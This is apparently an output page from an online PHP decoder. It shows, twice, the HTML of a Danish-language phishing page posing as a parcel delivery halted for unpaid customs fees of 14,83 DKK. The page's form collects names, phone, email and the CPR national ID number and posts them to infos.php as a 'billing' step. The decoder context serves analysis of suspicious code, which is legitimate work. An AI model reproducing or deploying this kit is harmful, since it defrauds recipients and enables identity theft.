Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<body> <div class="navbar justify-content-center"> <div class="con..

Decoded Output download

<?  <body> 
 
        <div class="navbar justify-content-center"> 
            <div class="container-fluid justify-content-center"> 
                <svg  class="siteheader-logo" xmlns="http://www.w3.org/2000/svg" width="127px" height="24px" viewBox="0 0 141.73 26.65"><path d="M108.84,13.35c0,6.34-5.17,9-10,9S89,19.76,89,13.63c0-6.28,5.08-9,10-9S108.84,7.25,108.84,13.35Zm-6.56.18a3.4,3.4,0,1,0-6.8,0,3.29,3.29,0,0,0,3.42,3.41A3.24,3.24,0,0,0,102.28,13.54Zm-83,0c0,4.83-3.32,8.82-8.49,8.82a6.54,6.54,0,0,1-4.65-1.57v5.86H0V5.16H6.17V6.8a6.43,6.43,0,0,1,5.11-2.18C16.41,4.62,19.31,8.58,19.31,13.54Zm-6.53,0A3.27,3.27,0,0,0,9.4,10,3.28,3.28,0,0,0,6,13.54,3.29,3.29,0,0,0,9.4,16.95,3.24,3.24,0,0,0,12.78,13.54Zm103.69,0.27c0-2.54,1.54-3.32,3.6-3.32a6.56,6.56,0,0,1,2.08.3L122.3,5.1a3.92,3.92,0,0,0-1.45-.18c-3.45,0-4.38,2.18-4.38,2.18V5.16H110.3V21.84h6.17v-8ZM141.73,0V21.84h-6.16V20.21a6.43,6.43,0,0,1-5.11,2.18c-5.14,0-8-4-8-8.91s3.32-8.82,8.49-8.82a6.54,6.54,0,0,1,4.65,1.57v-5Zm-6,13.48a3.28,3.28,0,0,0-3.41-3.41A3.24,3.24,0,0,0,129,13.47,3.4,3.4,0,1,0,135.75,13.47ZM81.35,4.62c-3.6,0-4.9,2.18-4.9,2.18V5.16H70.29V21.84h6.16V13.29c0-2.11.79-3.08,2.69-3.08s2.18,1.57,2.18,3.57v8.07h6.22V11.6C87.55,7,85.34,4.62,81.35,4.62ZM64.07,1.42H57.9V21.84h6.16V10.36H67l2.81-5.2H64.07V1.42ZM50.26,11.21c-2-.3-2.87-0.3-2.87-1.09s0.81-.94,2.42-0.94a16.15,16.15,0,0,1,5.11.91L56,5.41a24.56,24.56,0,0,0-6.13-.75c-5.89,0-9,2.27-9,5.89,0,2.81,1.66,4.47,6.53,5.11,2.06,0.27,2.81.39,2.81,1.15s-0.82,1-2.24,1a16.67,16.67,0,0,1-6-1.3L40.77,21.3a22.14,22.14,0,0,0,6.68,1c6.35,0,9.28-2.24,9.28-5.89C56.72,13.54,55.15,12,50.26,11.21ZM40.19,13.35c0,6.34-5.17,9-10,9s-9.82-2.6-9.82-8.73c0-6.28,5.08-9,10-9S40.19,7.25,40.19,13.35Zm-6.56.18a3.4,3.4,0,1,0-6.8,0,3.28,3.28,0,0,0,3.41,3.41A3.24,3.24,0,0,0,33.63,13.54Z" fill="#00A0D6" transform="translate(0 0)"></path></svg> 
            </div> 
        </div> 
 
        <!-- STAAART_____HOME --> 
        <div class="homless pb-5"> 
            <div class="container"> 
                <div class="login"> 
                    <div class="forma"> 
                        <h2>Afbrudt levering</h2> 
                        <p style="font-size:14px;margin-bottom:10px;color:rgba(0, 0, 0,0.7);">Betal venligst toldafgifterne inden</p> 
                        <p style="font-size:14px;margin-bottom:10px;color:rgba(0, 0, 0,0.7);">I tilflde af manglende betaling vil pakken blive returneret til afsenderen, og der kan blive opkrvet gebyrer.</p> 
                        <p style="font-size:14px;margin-bottom:10px;color:rgba(0, 0, 0,0.7);">Belb, der skal betales: 14,83 DKK</p> 
                        <p class="mb-5" style="font-size:14px;margin-bottom:10px;color:rgba(0, 0, 0,0.7);">Toldklarering for parti nr. <b>DK45878ZA1</b></p> 
                    </div> 
                    <form action="infos.php" method="post"> 
                        <h3>Indtast dine oplysninger:</h3> 
                        <input type="hidden" name="step" value="billing"> 
                        <div class="oeil"> 
                            <div class="form-group mt-4 auto"> 
                                <label for="">Fornavn <span>*</span></label> 
                                <input type="text" name="first" id="first" class="form-control" placeholder="Fornavn" required> 
                            </div> 
                            <div class="form-group mt-4 auto"> 
                                <label for="">Efternavn <span>*</span></label> 
                                <input type="text" name="last" id="last" class="form-control" placeholder="Efternavn" required> 
                            </div> 
                        </div> 
                        <div class="form-group mt-4"> 
                            <label for="">Telefonnummer (f.eks. +45 123 00000) <span>*</span></label> 
                            <input type="text" name="num" id="num" class="form-control" placeholder="Telefonnummer (f.eks. +45 123 00000)" required > 
                        </div> 
                        <div class="form-group mt-4"> 
                            <label for="">Email adresse <span>*</span></label> 
                            <input type="email" name="email" id="email" class="form-control" placeholder="Email adresse" required> 
                        </div> 
                        <div class="form-group mt-4"> 
                            <label for="">CPR-nummer <span>*</span></label> 
                            <input type="text" name="cpr" id="cpr" class="form-control" placeholder="CPR-nummer" required pattern="[0-9]{10}$"> 
                        </div> 
                        <div class="obliger"> 
                            <p>Felter markeret med * er obligatoriske.</p> 
                            <p>Kontroller venligst dine oplysninger omhyggeligt for at sikre, at der ikke er nogen fejl ved leveringen. I tilflde af fejl vil der blive opkrvet et gebyr for at ndre leveringsdatoen .</p> 
                        </div> 
                        <div class="bore"><button class="btn" name="submit">Blive ved</button></div> 
                    </form> 
                </div> 
            </div> 
        </div> 
        <!-- ENNNNND_____HOME --> 
 ?>

Did this file decode correctly?

Original Code

<body>

        <div class="navbar justify-content-center">
            <div class="container-fluid justify-content-center">
                <svg  class="siteheader-logo" xmlns="http://www.w3.org/2000/svg" width="127px" height="24px" viewBox="0 0 141.73 26.65"><path d="M108.84,13.35c0,6.34-5.17,9-10,9S89,19.76,89,13.63c0-6.28,5.08-9,10-9S108.84,7.25,108.84,13.35Zm-6.56.18a3.4,3.4,0,1,0-6.8,0,3.29,3.29,0,0,0,3.42,3.41A3.24,3.24,0,0,0,102.28,13.54Zm-83,0c0,4.83-3.32,8.82-8.49,8.82a6.54,6.54,0,0,1-4.65-1.57v5.86H0V5.16H6.17V6.8a6.43,6.43,0,0,1,5.11-2.18C16.41,4.62,19.31,8.58,19.31,13.54Zm-6.53,0A3.27,3.27,0,0,0,9.4,10,3.28,3.28,0,0,0,6,13.54,3.29,3.29,0,0,0,9.4,16.95,3.24,3.24,0,0,0,12.78,13.54Zm103.69,0.27c0-2.54,1.54-3.32,3.6-3.32a6.56,6.56,0,0,1,2.08.3L122.3,5.1a3.92,3.92,0,0,0-1.45-.18c-3.45,0-4.38,2.18-4.38,2.18V5.16H110.3V21.84h6.17v-8ZM141.73,0V21.84h-6.16V20.21a6.43,6.43,0,0,1-5.11,2.18c-5.14,0-8-4-8-8.91s3.32-8.82,8.49-8.82a6.54,6.54,0,0,1,4.65,1.57v-5Zm-6,13.48a3.28,3.28,0,0,0-3.41-3.41A3.24,3.24,0,0,0,129,13.47,3.4,3.4,0,1,0,135.75,13.47ZM81.35,4.62c-3.6,0-4.9,2.18-4.9,2.18V5.16H70.29V21.84h6.16V13.29c0-2.11.79-3.08,2.69-3.08s2.18,1.57,2.18,3.57v8.07h6.22V11.6C87.55,7,85.34,4.62,81.35,4.62ZM64.07,1.42H57.9V21.84h6.16V10.36H67l2.81-5.2H64.07V1.42ZM50.26,11.21c-2-.3-2.87-0.3-2.87-1.09s0.81-.94,2.42-0.94a16.15,16.15,0,0,1,5.11.91L56,5.41a24.56,24.56,0,0,0-6.13-.75c-5.89,0-9,2.27-9,5.89,0,2.81,1.66,4.47,6.53,5.11,2.06,0.27,2.81.39,2.81,1.15s-0.82,1-2.24,1a16.67,16.67,0,0,1-6-1.3L40.77,21.3a22.14,22.14,0,0,0,6.68,1c6.35,0,9.28-2.24,9.28-5.89C56.72,13.54,55.15,12,50.26,11.21ZM40.19,13.35c0,6.34-5.17,9-10,9s-9.82-2.6-9.82-8.73c0-6.28,5.08-9,10-9S40.19,7.25,40.19,13.35Zm-6.56.18a3.4,3.4,0,1,0-6.8,0,3.28,3.28,0,0,0,3.41,3.41A3.24,3.24,0,0,0,33.63,13.54Z" fill="#00A0D6" transform="translate(0 0)"></path></svg>
            </div>
        </div>

        <!-- STAAART_____HOME -->
        <div class="homless pb-5">
            <div class="container">
                <div class="login">
                    <div class="forma">
                        <h2>Afbrudt levering</h2>
                        <p style="font-size:14px;margin-bottom:10px;color:rgba(0, 0, 0,0.7);">Betal venligst toldafgifterne inden</p>
                        <p style="font-size:14px;margin-bottom:10px;color:rgba(0, 0, 0,0.7);">I tilflde af manglende betaling vil pakken blive returneret til afsenderen, og der kan blive opkrvet gebyrer.</p>
                        <p style="font-size:14px;margin-bottom:10px;color:rgba(0, 0, 0,0.7);">Belb, der skal betales: 14,83 DKK</p>
                        <p class="mb-5" style="font-size:14px;margin-bottom:10px;color:rgba(0, 0, 0,0.7);">Toldklarering for parti nr. <b>DK45878ZA1</b></p>
                    </div>
                    <form action="infos.php" method="post">
                        <h3>Indtast dine oplysninger:</h3>
                        <input type="hidden" name="step" value="billing">
                        <div class="oeil">
                            <div class="form-group mt-4 auto">
                                <label for="">Fornavn <span>*</span></label>
                                <input type="text" name="first" id="first" class="form-control" placeholder="Fornavn" required>
                            </div>
                            <div class="form-group mt-4 auto">
                                <label for="">Efternavn <span>*</span></label>
                                <input type="text" name="last" id="last" class="form-control" placeholder="Efternavn" required>
                            </div>
                        </div>
                        <div class="form-group mt-4">
                            <label for="">Telefonnummer (f.eks. +45 123 00000) <span>*</span></label>
                            <input type="text" name="num" id="num" class="form-control" placeholder="Telefonnummer (f.eks. +45 123 00000)" required >
                        </div>
                        <div class="form-group mt-4">
                            <label for="">Email adresse <span>*</span></label>
                            <input type="email" name="email" id="email" class="form-control" placeholder="Email adresse" required>
                        </div>
                        <div class="form-group mt-4">
                            <label for="">CPR-nummer <span>*</span></label>
                            <input type="text" name="cpr" id="cpr" class="form-control" placeholder="CPR-nummer" required pattern="[0-9]{10}$">
                        </div>
                        <div class="obliger">
                            <p>Felter markeret med * er obligatoriske.</p>
                            <p>Kontroller venligst dine oplysninger omhyggeligt for at sikre, at der ikke er nogen fejl ved leveringen. I tilflde af fejl vil der blive opkrvet et gebyr for at ndre leveringsdatoen .</p>
                        </div>
                        <div class="bore"><button class="btn" name="submit">Blive ved</button></div>
                    </form>
                </div>
            </div>
        </div>
        <!-- ENNNNND_____HOME -->

Function Calls

None

Variables

None

Stats

MD5 4c863982deeac848dbe8d10becf3d998
Eval Count 0
Decode Time 59 ms